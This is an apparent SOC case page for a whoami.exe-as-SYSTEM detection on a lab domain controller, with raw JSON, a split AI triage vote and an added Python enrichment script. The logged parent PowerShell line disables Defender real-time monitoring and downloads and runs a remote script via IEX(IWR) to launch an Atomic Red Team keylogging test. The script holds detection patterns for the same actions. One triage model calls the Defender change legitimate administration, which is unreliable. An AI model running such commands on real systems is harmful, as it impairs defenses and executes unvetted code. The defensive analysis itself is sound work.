Severity: high · Status: closed · Verdict: suspicious

๐Ÿท๏ธ Analyst Verdict Classification

SUSPICIOUS by analyst

๐Ÿค– AI Analysis

๐Ÿ”” Detections (1)

Whoami.EXE Execution From Privileged Process · Severity: high
Rule: service.windows_process_creation/proc_creation_win_whoami_execution_from_high_priv_process
Hostname: df-labsdc01.dflabs.local · Sensor: e4a1c62d-4d1f-44...
Event Type: NEW_PROCESS
Confidence: 82% · Verdict: suspicious
Event Data:
COMMAND_LINE: "C:\Windows\system32\whoami.exe"
FILE_IS_SIGNED: 1
FILE_PATH: C:\Windows\system32\whoami.exe
HASH: 1d5491e3c468ee4b4ef6edff4bbc7d06ee83180f6f0b1576763ea2efe049493a
MEMORY_USAGE: 32768
PARENT: {'BASE_ADDRESS': 140694944940032, 'COMMAND_LINE': "PowerShell.exe Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1056.001 -CheckPrereqs ; Invoke-AtomicTest T1056.001 -GetPrereqs ; Invoke-AtomicTest T1056.001 ", 'FILE_IS_SIGNED': 1, 'FILE_PATH': 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', 'HASH': 'de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c', 'MEMORY_USAGE': 193449984, 'PARENT_ATOM': '0c13305cb3f73d15515e789969c2a835', 'PARENT_PROCESS_ID': 2440, 'PROCESS_ID': 3164, 'THIS_ATOM': '6b593eddb775332b5050941f69c2a838', 'THREADS': 32, 'TIMESTAMP': 1774364726507, 'USER_NAME': 'NT AUTHORITY\\SYSTEM'}
PARENT_PROCESS_ID: 3164
PROCESS_ID: 9048
USER_NAME: NT AUTHORITY\SYSTEM
IOCs: file_path C:\Windows\system32\whoami.exe · hash 1d5491e3c468ee4b4ef6edff4bbc7d06ee83180f6f0b1576763ea2efe049493a
MITRE: T1033 (System Owner/User Discovery) is the rule's own tag. The triage JSON lists T1056.001 and T1056.002 instead; of those, only T1056.001 (Input Capture: Keylogging) is supported by the event, as the Atomic Red Team test named in the parent PowerShell command line. Nothing in the event supports T1056.002.
📄 Raw Detection JSON
{
  "author": "_ext-sigma-7a14fbc3-54d9-4b4d-8700-61eddada04f0[bulk][segment]",
  "cat": "Whoami.EXE Execution From Privileged Process",
  "detect": {
    "event": {
      "COMMAND_LINE": "\"C:\\Windows\\system32\\whoami.exe\"",
      "FILE_IS_SIGNED": 1,
      "FILE_PATH": "C:\\Windows\\system32\\whoami.exe",
      "HASH": "1d5491e3c468ee4b4ef6edff4bbc7d06ee83180f6f0b1576763ea2efe049493a",
      "MEMORY_USAGE": 32768,
      "PARENT": {
        "BASE_ADDRESS": 140694944940032,
        "COMMAND_LINE": "PowerShell.exe  Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1056.001 -CheckPrereqs ; Invoke-AtomicTest T1056.001 -GetPrereqs ; Invoke-AtomicTest T1056.001 ",
        "FILE_IS_SIGNED": 1,
        "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
        "MEMORY_USAGE": 193449984,
        "PARENT_ATOM": "0c13305cb3f73d15515e789969c2a835",
        "PARENT_PROCESS_ID": 2440,
        "PROCESS_ID": 3164,
        "THIS_ATOM": "6b593eddb775332b5050941f69c2a838",
        "THREADS": 32,
        "TIMESTAMP": 1774364726507,
        "USER_NAME": "NT AUTHORITY\\SYSTEM"
      },
      "PARENT_PROCESS_ID": 3164,
      "PROCESS_ID": 9048,
      "USER_NAME": "NT AUTHORITY\\SYSTEM"
    },
    "routing": {
      "arch": 2,
      "did": "",
      "event_id": "23304a4d-bf88-4639-afa5-dcdbfbe79c4b",
      "event_time": 1774364762339,
      "event_type": "NEW_PROCESS",
      "ext_ip": "67.60.122.240",
      "hostname": "df-labsdc01.dflabs.local",
      "iid": "47501359-645e-4049-906e-e6195da7afcf",
      "int_ip": "192.168.45.129",
      "latency": 1500,
      "moduleid": 2,
      "oid": "ad19afae-3759-4207-b06e-8648b225c455",
      "parent": "6b593eddb775332b5050941f69c2a838",
      "plat": 268435456,
      "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
      "tags": [
        "domain-controller",
        "fusion-soc-alert",
        "fusion-soc-case",
        "fusion-soc-pulled",
        "fusion-soc-triage"
      ],
      "this": "21a8a6a7b8dd3620e299741b69c2a85b"
    }
  },
  "detect_id": "4d4fc804-0031-4182-8f3e-913369c2a85b",
  "detect_mtd": {
    "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov",
    "description": "Detects the execution of \"whoami.exe\" by privileged accounts that are often abused by threat actors",
    "falsepositives": [
      "Unknown"
    ],
    "level": "high",
    "references": [
      "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment",
      "https://web.archive.org/web/20221019044836/https://nsudo.m2team.org/en-us/"
    ],
    "tags": [
      "attack.privilege-escalation",
      "attack.discovery",
      "attack.t1033"
    ]
  },
  "gen_time": 1774364763842,
  "link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364762\u0026selected=21a8a6a7b8dd3620e299741b69c2a85b",
  "namespace": "general",
  "routing": {
    "arch": 2,
    "did": "",
    "event_id": "23304a4d-bf88-4639-afa5-dcdbfbe79c4b",
    "event_time": 1774364762339,
    "event_type": "NEW_PROCESS",
    "ext_ip": "67.60.122.240",
    "hostname": "df-labsdc01.dflabs.local",
    "iid": "47501359-645e-4049-906e-e6195da7afcf",
    "int_ip": "192.168.45.129",
    "latency": 1500,
    "moduleid": 2,
    "oid": "ad19afae-3759-4207-b06e-8648b225c455",
    "parent": "6b593eddb775332b5050941f69c2a838",
    "plat": 268435456,
    "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
    "tags": [
      "domain-controller",
      "fusion-soc-alert",
      "fusion-soc-case",
      "fusion-soc-pulled",
      "fusion-soc-triage"
    ],
    "this": "21a8a6a7b8dd3620e299741b69c2a85b"
  },
  "rule_tags": [
    "ext:ext-sigma",
    "attack.privilege-escalation",
    "attack.discovery",
    "attack.t1033"
  ],
  "source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
  "source_rule": "service.windows_process_creation/proc_creation_win_whoami_execution_from_high_priv_process",
  "ts": 1774364764000
}
🌐 Threat Intel JSON
{
  "virustotal": {
    "malicious": false,
    "provider": "virustotal",
    "reputation": 3,
    "stats": {
      "confirmed-timeout": 0,
      "failure": 0,
      "harmless": 0,
      "malicious": 0,
      "suspicious": 0,
      "timeout": 0,
      "type-unsupported": 4,
      "undetected": 72
    }
  }
}
🤖 Triage JSON
{
  "confidence": 0.825,
  "false_positive_reason": "whoami.exe is a legitimate Windows system binary running from its expected location with valid Microsoft signature. The parent process PowerShell is executing administrative commands that include disabling real-time monitoring, which is consistent with management or testing scenarios rather than malicious activity.",
  "investigation_questions": [
    "What is the purpose of disabling real-time monitoring via Set-MpPreference?",
    "Is this PowerShell execution part of a scheduled maintenance task or automated testing framework?",
    "Has this user account been granted administrative privileges recently?"
  ],
  "ioc_analysis": "whoami.exe is a legitimate Windows utility located in C:\\Windows\\system32\\. The hash matches the known Microsoft signature for this binary, and it is properly signed. While whoami can be used for reconnaissance, its execution from a high-privilege process (SYSTEM) by PowerShell running administrative commands indicates a likely management or testing activity rather than malicious intent.",
  "iocs_extracted": [
    {
      "type": "file_path",
      "value": "C:\\Windows\\system32\\whoami.exe"
    },
    {
      "type": "hash",
      "value": "1d5491e3c468ee4b4ef6edff4bbc7d06ee83180f6f0b1576763ea2efe049493a"
    }
  ],
  "mitre_techniques": [
    "T1056.001",
    "T1056.002"
  ],
  "recommended_actions": [
    "Manual analyst review required \u2014 AI models (split)",
    "Verify the parent process PowerShell command line for legitimate administrative tasks",
    "Monitor for subsequent suspicious processes spawned by this session",
    "Document the event as a known false positive in the SIEM"
  ],
  "risk_score": 38,
  "severity": "high",
  "summary": "**Vote: SPLIT (1/2 -\u003e SUSPICIOUS)**\n\n### \u264a gemini-cli Analysis (Primary)\nFailed or timed out.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** false_positive | **Confidence:** 0.95\nThe detection of whoami.exe execution from a privileged process is flagged as benign because the binary is running from its expected system location and is Microsoft-signed. The parent process PowerShell is executing legitimate administrative commands including disabling real-time monitoring, which suggests a management or testing scenario rather than active exploitation.\n\n**IOC Analysis:** whoami.exe is a legitimate Windows utility located in C:\\Windows\\system32\\. The hash matches the known Microsoft signature for this binary, and it is properly signed. While whoami can be used for reconnaissance, its execution from a high-privilege process (SYSTEM) by PowerShell running administrative commands indicates a likely management or testing activity rather than malicious intent.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** suspicious | **Confidence:** 0.7\nThe detection event involves a whoami.exe execution from a privileged process, which is a legitimate Windows tool but may indicate reconnaissance. The parent process is PowerShell running suspicious scripts for Atomic Red Team, suggesting potential malicious intent.\n\n**IOC Analysis:** FILE_PATH: C:\\Windows\\system32\\whoami.exe is a legitimate Windows command-line utility for account discovery. HASH: 1d5491e3c468ee4b4ef6edff4bbc7d06ee83180f6f0b1576763ea2efe049493a is a known Microsoft-signed binary, making it likely benign. However, the execution context from a SYSTEM user and the parent process\u0027s suspicious script for Atomic Red Team installation raises concerns, indicating possible reconnaissance or privilege escalation attempts.",
  "verdict": "suspicious",
  "voting": {
    "auto_action": "manual_review",
    "mode": "split",
    "total_models": 2,
    "vote_summary": [
      "qwen3.5:4b: false_positive (low, 95% confidence)",
      "deepseek-r1:8b: suspicious (medium, 70% confidence)"
    ],
    "votes": [
      {
        "confidence": 0.95,
        "model": "qwen3.5:4b",
        "verdict": "false_positive"
      },
      {
        "confidence": 0.7,
        "model": "deepseek-r1:8b",
        "verdict": "suspicious"
      }
    ],
    "winning_count": 1,
    "winning_verdict": "suspicious"
  }
}
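The detection above fires on whoami.exe alone, and the split AI vote turned on how to read the parent. The parent PowerShell command line, running as NT AUTHORITY\SYSTEM on a host tagged domain-controller, sets the execution policy to Unrestricted, turns off Defender real-time protection with Set-MpPreference -DisableRealtimeMonitoring $true, downloads and executes a remote script via IEX (IWR ...), and invokes Atomic Red Team test T1056.001. That context, not the whoami binary (Microsoft-signed, 0/72 on VirusTotal), is what carries the analyst's SUSPICIOUS verdict. The following is an added example written for this page, not FusionSOC, LimaCharlie or Sigma project code: it re-runs an approximation of the rule's selection over three constructed NEW_PROCESS events and adds the parent-command-line enrichment the rule lacks. The first event copies the paths, user and command lines from the detection; the two baseline events (the DFLABS\jdoe user, the cmd.exe parents) are invented, and the indicator-to-technique mapping for the parent (T1562.001 for the Defender change, T1059.001 for the policy change and the download-and-execute) is the editor's, not something the rule emits.

```python
"""Added example: re-run the page's whoami detection plus a parent-command-line
enrichment over constructed LimaCharlie-style NEW_PROCESS events, offline."""
import re

# Constructed sample events shaped like LimaCharlie NEW_PROCESS records. The
# first reproduces the page's detection (paths, user and command lines copied
# from it); the other two are invented baselines for comparison.
EVENTS = [
    {
        "FILE_PATH": r"C:\Windows\system32\whoami.exe",
        "COMMAND_LINE": r'"C:\Windows\system32\whoami.exe"',
        "USER_NAME": r"NT AUTHORITY\SYSTEM",
        "PARENT": {
            "FILE_PATH": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
            "COMMAND_LINE": (
                "PowerShell.exe Set-ExecutionPolicy Unrestricted ; "
                "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; "
                "Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; "
                "Set-MpPreference -DisableRealtimeMonitoring $true ; "
                "IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/"
                "master/install-atomicredteam.ps1' -UseBasicParsing) ; "
                "Install-AtomicRedTeam -Force -getAtomics; "
                "Invoke-AtomicTest T1056.001 -CheckPrereqs ; "
                "Invoke-AtomicTest T1056.001 -GetPrereqs ; Invoke-AtomicTest T1056.001 "
            ),
        },
    },
    {  # constructed: an ordinary user inspecting their own token from cmd.exe
        "FILE_PATH": r"C:\Windows\system32\whoami.exe",
        "COMMAND_LINE": "whoami /groups",
        "USER_NAME": r"DFLABS\jdoe",
        "PARENT": {"FILE_PATH": r"C:\Windows\system32\cmd.exe", "COMMAND_LINE": "cmd.exe"},
    },
    {  # constructed: SYSTEM-context whoami with an unremarkable parent
        "FILE_PATH": r"C:\Windows\system32\whoami.exe",
        "COMMAND_LINE": "whoami",
        "USER_NAME": r"NT AUTHORITY\SYSTEM",
        "PARENT": {"FILE_PATH": r"C:\Windows\system32\cmd.exe", "COMMAND_LINE": "cmd.exe /c whoami"},
    },
]

# Approximation of the Sigma rule's selection (not the rule file itself):
# whoami.exe image run under a built-in privileged account. The substring
# markers cover "NT AUTHORITY" and localized spellings such as "AUTORITE NT".
PRIV_USER_MARKERS = ("AUTHORI", "AUTORI")

def whoami_from_privileged(event):
    image = event.get("FILE_PATH", "").lower()
    user = event.get("USER_NAME", "").upper()
    return image.endswith("\\whoami.exe") and any(m in user for m in PRIV_USER_MARKERS)

# Parent-command-line indicators, each with the ATT&CK technique the editor
# maps it to (assumption). The page's rule does not inspect the parent at all;
# this is the context the split AI vote disagreed about.
PARENT_INDICATORS = [
    (r"Set-MpPreference\s+-DisableRealtimeMonitoring\s+\$true", "T1562.001",
     "Defender real-time protection switched off"),
    (r"Set-ExecutionPolicy\s+(Unrestricted|Bypass)", "T1059.001",
     "PowerShell execution policy loosened"),
    (r"\b(IEX|Invoke-Expression)\b.*\b(IWR|Invoke-WebRequest|DownloadString)\b", "T1059.001",
     "remote script downloaded and executed in memory"),
    (r"Invoke-AtomicTest\s+T\d{4}", None, "Atomic Red Team test invoked"),
]
ATOMIC_ID_RE = re.compile(r"Invoke-AtomicTest\s+(T\d{4}(?:\.\d{3})?)", re.IGNORECASE)

def parent_indicators(event):
    """Return [(technique_or_None, reason)] for every indicator found in the parent."""
    cmd = event.get("PARENT", {}).get("COMMAND_LINE", "")
    return [(tech, why) for pat, tech, why in PARENT_INDICATORS
            if re.search(pat, cmd, re.IGNORECASE)]

def triage(event):
    """Apply the rule, then enrich with parent context and suggest a verdict."""
    if not whoami_from_privileged(event):
        return {"matched": False, "verdict": "no_match", "techniques": [],
                "reasons": [], "atomic_tests": []}
    hits = parent_indicators(event)
    parent_cmd = event.get("PARENT", {}).get("COMMAND_LINE", "")
    # T1033 is the rule's own tag; parent techniques are appended, deduplicated.
    techniques = list(dict.fromkeys(["T1033"] + [t for t, _ in hits if t]))
    atomic_tests = list(dict.fromkeys(ATOMIC_ID_RE.findall(parent_cmd)))
    # whoami under SYSTEM alone is low signal (the rule lists its false
    # positives as "Unknown"); defense impairment in the parent is what
    # justifies escalating rather than closing as benign.
    if any(t == "T1562.001" for t, _ in hits):
        verdict = "suspicious"
    elif hits:
        verdict = "investigate"
    else:
        verdict = "review"
    return {"matched": True, "verdict": verdict, "techniques": techniques,
            "reasons": [why for _, why in hits], "atomic_tests": atomic_tests}

if __name__ == "__main__":
    for ev in EVENTS:
        print(ev["USER_NAME"], "->", triage(ev))
```

Run it with python and the page's event comes back suspicious with T1033, T1562.001 and T1059.001 and the Atomic test ID T1056.001 pulled from the parent; the SYSTEM whoami under a clean cmd.exe parent only reaches review, and the unprivileged user never matches the rule. The verdict tiers are deliberately coarse: the point is that the parent's defense impairment, not the child's hash or signature, is the field an analyst should be shown first.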

⚙️ Response Actions

Action | Target | Status | Result
tag | e4a1c62d-4d1f-4472-bae4-43291246b4d4:fusionsoc-investigated | failed | 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated
recommended | Manual analyst review required — AI models (split) | executed | General Activity Sweep: 0 events found
recommended | Verify the parent process PowerShell command line for legitimate administrative tasks | executed | Process Tree Investigation: 75 events found
recommended | Monitor for subsequent suspicious processes spawned by this session | executed | Process Tree Investigation: 75 events found
recommended | Document the event as a known false positive in the SIEM | executed | General Activity Sweep: 0 events found


💬 Notes (5)

🤖 FusionSOC AI 2026-03-24T15:52 (five notes, all by the same author in the same minute; their previews appear in the timeline below)

📜 Timeline

2026-03-24T16:04:25 · analyst · Status changed: investigating → closed
2026-03-24T16:04:23 · analyst · Analyst classified as Suspicious (SUSPICIOUS)
2026-03-24T15:52:25 · FusionSOC AI · Status changed: investigating → investigating
2026-03-24T15:52:25 · FusionSOC · Action recommended → executed: General Activity Sweep: 0 events found
2026-03-24T15:52:25 · FusionSOC AI · Note by FusionSOC AI: ## 🔍 General Activity Sweep **Action:** Document the event as a known false positive in the SIEM **Sensor:** `e4a1c62d-4...
2026-03-24T15:52:25 · FusionSOC · Response action queued: recommended on Document the event as a known false positive in the SIEM
2026-03-24T15:52:25 · FusionSOC AI · Status changed: investigating → investigating
2026-03-24T15:52:25 · FusionSOC · Action recommended → executed: Process Tree Investigation: 75 events found
2026-03-24T15:52:25 · FusionSOC AI · Note by FusionSOC AI: ## 🔍 Process Tree Investigation **Action:** Monitor for subsequent suspicious processes spawned by this session **Sensor...
2026-03-24T15:52:25 · FusionSOC · Response action queued: recommended on Monitor for subsequent suspicious processes spawned by this session
2026-03-24T15:52:25 · FusionSOC AI · Status changed: investigating → investigating
2026-03-24T15:52:25 · FusionSOC · Action recommended → executed: Process Tree Investigation: 75 events found
2026-03-24T15:52:25 · FusionSOC AI · Note by FusionSOC AI: ## 🔍 Process Tree Investigation **Action:** Verify the parent process PowerShell command line for legitimate administrat...
2026-03-24T15:52:24 · FusionSOC · Response action queued: recommended on Verify the parent process PowerShell command line for legitimate administrative tasks
2026-03-24T15:52:24 · FusionSOC AI · Status changed: open → investigating
2026-03-24T15:52:24 · FusionSOC · Action recommended → executed: General Activity Sweep: 0 events found
2026-03-24T15:52:24 · FusionSOC AI · Note by FusionSOC AI: ## 🔍 General Activity Sweep **Action:** Manual analyst review required — AI models (split) **Sensor:** `e4a1c62d-4d1f-44...
2026-03-24T15:52:24 · FusionSOC · Response action queued: recommended on Manual analyst review required — AI models (split)
2026-03-24T15:52:24 · FusionSOC · Action tag → failed: 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated
2026-03-24T15:52:24 · FusionSOC · Response action queued: tag on e4a1c62d-4d1f-4472-bae4-43291246b4d4:fusionsoc-investigated
2026-03-24T15:52:23 · FusionSOC AI · Detection 4d4fc804-0031-4182-8f3e-913369c2a85b triaged as suspicious (high severity, confidence: 82%)
2026-03-24T15:52:23 · FusionSOC AI · Case created from detection: service.windows_process_creation/proc_creation_win_whoami_execution_from_high_priv_process